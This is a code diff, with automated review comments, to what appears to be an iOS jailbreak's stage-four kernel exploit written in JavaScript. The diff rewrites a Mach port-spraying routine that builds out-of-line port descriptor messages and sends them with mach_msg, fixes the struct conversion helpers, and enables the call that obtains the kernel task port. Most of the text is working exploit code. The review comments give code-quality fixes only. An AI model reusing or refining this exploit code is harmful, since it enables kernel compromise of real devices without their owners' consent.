-rwxr-xr-xsrc/stage4/kexp/exploit.js27
-rw-r--r--src/stage4/lib/native_ptr.js20
-rw-r--r--src/stage4/main.js132
3 files changed, 97 insertions, 82 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+ p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
}
function send_ports(target, payload, num, number_port_descs) {
+ if (0) {
var init_port_set = shit_heap(num * 4);
for (var i = 0; i < num; i++) {
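Review bot: The added `if (0) {` keeps the entire old shit_heap-based body of send_ports alive as dead code, and because `var` is function-scoped, the `var init_port_set` and `var i` declared inside the disabled block still hoist into the same scope as the new `var init_port_set = new mach_port_t(num)` introduced in the next hunk, so a reader has to trace the braces to know which declaration is live. Delete the disabled block and rely on version history, or at minimum replace `if (0) {` with a comment naming what is being kept and why. The same pattern is introduced by the closing `}` in the @@ -281,8 +282,30 @@ hunk of this file and by the `if (0) {` that wraps the test-message code in src/stage4/main.js. send_ports continues beyond the end of this hunk.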
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
large_buf[req_head_msgh_id >>> 2] = 1337;
// p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+ var init_port_set = new mach_port_t(num);
+
+ var InP = new Request_sp(number_port_descs);
+ var InP_obj = InP.deref();
+ InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+ for (var i = 0; i < number_port_descs; i++) {
+ InP_obj.init_port_set[i].address = init_port_set.addy;
+ InP_obj.init_port_set[i].count = num;
+ InP_obj.init_port_set[i].disposition = 19;
+ InP_obj.init_port_set[i].deallocate = false;
+ InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ }
+
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = target;
+ InP_obj.Head.msgh_local_port = 0;
+ InP_obj.Head.msgh_id = 1337;
+
+ InP.write(InP_obj);
- var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
return ret;
}
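Review bot: The message length on the new mach_msg line, `0x1c + (number_port_descs * 0xc)`, re-encodes the layout that native_ptr.js already declares for Request_sp as `24 + 4 + 12`; if either side changes, the two drift silently, so name the header and descriptor sizes once and use them in both places. The `disposition = 19` literal should use the named Mach constant, consistent with the msgh_bits line that already uses MACH_MSG_TYPE_MAKE_SEND_ONCE (19 appears to be MACH_MSG_TYPE_COPY_SEND — confirm against mach/message.h). Neither `InP` nor `init_port_set` is released after the send, whereas spray_ports frees its `mp` buffer with shit_heap_free; if native_ptr allocations have a release path, call it, and if they are intentionally leaked, say so in a comment such as `// InP/init_port_set are not freed: TODO confirm native_ptr lifetime`.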
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 464d865..3741e80 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -33,7 +33,6 @@ class native_ptr {
if (Object.getPrototypeOf(this).deref_all != undefined) {
this.size *= this.count;
- p0laris_log("get lucky %d", this.size);
}
if (this.addy === undefined) {
@@ -197,34 +196,27 @@ function mach_msg_header_t_obj_to_buf(obj) {
function mach_msg_body_t_buf_to_obj(buf) {
var ret = {};
- ret.msgh_descriptor_count = u32_to_u8x4(buf);
+ ret.msgh_descriptor_count = u8x4_to_u32(buf);
return ret;
}
function mach_msg_body_t_obj_to_buf(obj) {
- var ret = u8x4_to_u32(obj.msgh_descriptor_count);
+ var ret = u32_to_u8x4(obj.msgh_descriptor_count);
return ret;
}
function Request_sp_buf_to_obj(buf) {
var ret = {};
- p0laris_log("w00t %d %s", buf.length, Object.getOwnPropertyNames(Object.getPrototypeOf(buf)).toString());
var Head_buf = buf.subarray(0, 24);
- p0laris_log("w00t");
var msgh_body_buf = buf.subarray(24, 28);
- p0laris_log("w00t");
var init_port_set_buf = buf.subarray(28);
- p0laris_log("w00t");
ret.Head = mach_msg_header_t_buf_to_obj(Head_buf);
- p0laris_log("w00t");
ret.msgh_body = mach_msg_body_t_buf_to_obj(msgh_body_buf);
- p0laris_log("w00t");
ret.init_port_set = new Array();
for (var i = 0; i < (buf.length - 28) / 28; i++) {
- p0laris_log("%d", i);
var init_port_set_buf = buf.subarray((i * 28) + 28);
ret.init_port_set.push(mach_msg_ool_ports_descriptor_t_buf_to_obj(init_port_set_buf));
}
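Review bot: Request_sp_buf_to_obj walks init_port_set with a 28-byte stride (`(buf.length - 28) / 28` and `subarray((i * 28) + 28)`), while Request_sp_obj_to_buf in the following hunks packs each descriptor at `begin + (i * 12) + j` and the type is declared as `24 + 4 + 12`; the two directions disagree, so a deref() after write() cannot round-trip, and the fractional loop bound yields an element count that need not match msgh_descriptor_count. Pick one stride, define it once as a named constant, and use it in both functions. Separately, `var init_port_set_buf` is declared twice in this function (before the loop and inside it) with the first value never used, and `new Array()` should be `[]`.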
@@ -236,7 +228,6 @@ function Request_sp_obj_to_buf(obj) {
var ret = new Uint8Array(this.size * this.count);
var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
var begin = 0;
- p0laris_log("w00t");
var i = 0;
begin = i;
@@ -245,7 +236,6 @@ function Request_sp_obj_to_buf(obj) {
ret[i] = tmp[i - begin];
}
- p0laris_log("w00t");
begin = i;
var tmp = mach_msg_body_t_obj_to_buf(obj.msgh_body);
@@ -254,7 +244,6 @@ function Request_sp_obj_to_buf(obj) {
ret[i] = tmp[i - begin];
}
- p0laris_log("w00t");
begin = i;
for (var i = 0; i < obj.init_port_set.length; i++) {
@@ -263,7 +252,6 @@ function Request_sp_obj_to_buf(obj) {
ret[begin + (i * 12) + j] = tmp[j];
}
}
- p0laris_log("w00t");
return ret;
}
@@ -279,4 +267,6 @@ var mach_msg_ool_ports_descriptor_t = native_ptr_type(12,
var Request_sp = native_ptr_type(24 + 4 + 12,
Request_sp_buf_to_obj,
Request_sp_obj_to_buf);
-Request_sp.prototype.deref_all = true;
\ No newline at end of file
+Request_sp.prototype.deref_all = true;
+
+var mach_port_t = native_ptr_type(4);
\ No newline at end of file
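Review bot: `var mach_port_t = native_ptr_type(4)` supplies no buf_to_obj/obj_to_buf converters and no deref_all flag, unlike the other types declared above it; from the constructor lines visible at the top of this file, count only scales the size when deref_all is set, so whether `new mach_port_t(num)` reserves `num` 4-byte slots or a single one is not evident from this declaration. Add a comment stating the intended contract, e.g. `// mach_port_t[]: raw 4-byte slots with no object converters — TODO confirm count is honored without deref_all`. Also end the file with a newline so the next addition does not produce another no-newline hunk.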
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
prep_shit();
- var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
- var addy = init_port_set.addy;
- var init_port_set_obj = init_port_set.deref();
- init_port_set_obj.address = 0x41414141;
- init_port_set_obj.count = 0x42424242;
- init_port_set_obj.disposition = 19;
- init_port_set_obj.deallocate = false;
- init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- init_port_set.write(init_port_set_obj, 0);
- init_port_set.write(init_port_set_obj, 1);
- init_port_set.write(init_port_set_obj, 2);
- init_port_set.write(init_port_set_obj, 3);
- p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
- JSON.stringify(init_port_set.deref(1)),
- JSON.stringify(init_port_set.deref(2)),
- JSON.stringify(init_port_set.deref(3)));
-
- var Head = new mach_msg_header_t();
- var addy = Head.addy;
- var Head_obj = Head.deref();
- Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- Head_obj.msgh_remote_port = 0x41424344;
- Head_obj.msgh_local_port = 0x45464748;
- Head_obj.msgh_id = 1337;
- Head.write(Head_obj);
- p0laris_log("%s", JSON.stringify(Head.deref()));
-
- p0laris_log("here");
-
- var req = new Request_sp(4);
- p0laris_log("here");
- var addy = req.addy;
- p0laris_log("here");
- var req_obj = req.deref();
- p0laris_log("here");
-
- req_obj.msgh_body.msgh_descriptor_count = 4;
- p0laris_log("here");
- for (var i = 0; i < 4; i++) {
- req_obj.init_port_set[i].address = 0x1234;
- req_obj.init_port_set[i].count = 0x1235;
- req_obj.init_port_set[i].disposition = 19;
- req_obj.init_port_set[i].deallocate = false;
- req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- }
-
- p0laris_log("here");
- req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- p0laris_log("here");
- req_obj.Head.msgh_remote_port = 0x41424344;
- p0laris_log("here");
- req_obj.Head.msgh_local_port = 0x45464748;
- p0laris_log("here");
- req_obj.Head.msgh_id = 1337;
-
- p0laris_log("here");
- req.write(req_obj);
- p0laris_log("here");
- p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
- if (typeof value === 'number') {
- return "0x" + value.toString(16);
+ if (0) {
+ var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+ var addy = init_port_set.addy;
+ var init_port_set_obj = init_port_set.deref();
+ init_port_set_obj.address = 0x41414141;
+ init_port_set_obj.count = 0x42424242;
+ init_port_set_obj.disposition = 19;
+ init_port_set_obj.deallocate = false;
+ init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ init_port_set.write(init_port_set_obj, 0);
+ init_port_set.write(init_port_set_obj, 1);
+ init_port_set.write(init_port_set_obj, 2);
+ init_port_set.write(init_port_set_obj, 3);
+ p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+ JSON.stringify(init_port_set.deref(1)),
+ JSON.stringify(init_port_set.deref(2)),
+ JSON.stringify(init_port_set.deref(3)));
+
+ var Head = new mach_msg_header_t();
+ var addy = Head.addy;
+ var Head_obj = Head.deref();
+ Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ Head_obj.msgh_remote_port = 0x41424344;
+ Head_obj.msgh_local_port = 0x45464748;
+ Head_obj.msgh_id = 1337;
+ Head.write(Head_obj);
+ p0laris_log("%s", JSON.stringify(Head.deref()));
+
+ p0laris_log("here");
+
+ var req = new Request_sp(4);
+ p0laris_log("here");
+ var addy = req.addy;
+ p0laris_log("here");
+ var req_obj = req.deref();
+ p0laris_log("here");
+
+ req_obj.msgh_body.msgh_descriptor_count = 4;
+ p0laris_log("here");
+ for (var i = 0; i < 4; i++) {
+ req_obj.init_port_set[i].address = 0x1234;
+ req_obj.init_port_set[i].count = 0x1235;
+ req_obj.init_port_set[i].disposition = 19;
+ req_obj.init_port_set[i].deallocate = false;
+ req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
}
- return value;
- }, "\t"));
- p0laris_log("here");
+ p0laris_log("here");
+ req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ p0laris_log("here");
+ req_obj.Head.msgh_remote_port = 0x41424344;
+ p0laris_log("here");
+ req_obj.Head.msgh_local_port = 0x45464748;
+ p0laris_log("here");
+ req_obj.Head.msgh_id = 1337;
+
+ p0laris_log("here");
+ req.write(req_obj);
+ p0laris_log("here");
+ p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+ if (typeof value === 'number') {
+ return "0x" + value.toString(16);
+ }
+
+ return value;
+ }, "\t"));
+ p0laris_log("here");
+ }
-// var tfp0 = get_kernel_task();
+ var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
return 0;